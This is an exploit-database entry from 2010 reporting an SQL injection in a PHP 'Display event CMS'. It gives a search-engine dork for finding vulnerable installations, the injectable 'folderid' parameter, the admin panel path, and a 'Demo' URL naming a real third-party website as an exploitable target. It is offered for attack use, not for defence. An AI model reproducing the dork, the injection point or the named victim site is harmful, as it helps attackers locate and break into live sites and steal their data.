Display event CMS SQL Injection Vulnerability

2010-10-04T00:00:00
ID 1337DAY-ID-14321
Type zdt
Reporter Game Over
Modified 2010-10-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================
Display event CMS SQL Injection Vulnerability
=============================================

[+] Auth0r : Game Over
[+] E-m41L : gameover20[at]live[dot]com
[+] D0rk   : inurl:index.php?action=cms.display
[+] S-Site : http://www.getmura.com/index.cfm/app-store/apps/display-tools/
[+] -------------------------------------------------------------------
[+] SQl Injection Vulnerability :
[+] example :localhost//index.php?action=cms.display&lang=en&folderid=[n]

[+] localhost//index.php?action=cms.display&lang=en&folderid=[sql]

[+] Demo : http://www.gis-ag.ch/index.php?action=cms.display&lang=en&folderid=7`

[+] adminpanel : localhost/admin.php
[+]----------------------------------------------------------------------
[+] Greetz To : Cr4cK3R-LuL!
[+]----------------------------------------------------------------------




#  0day.today [2018-01-03]  #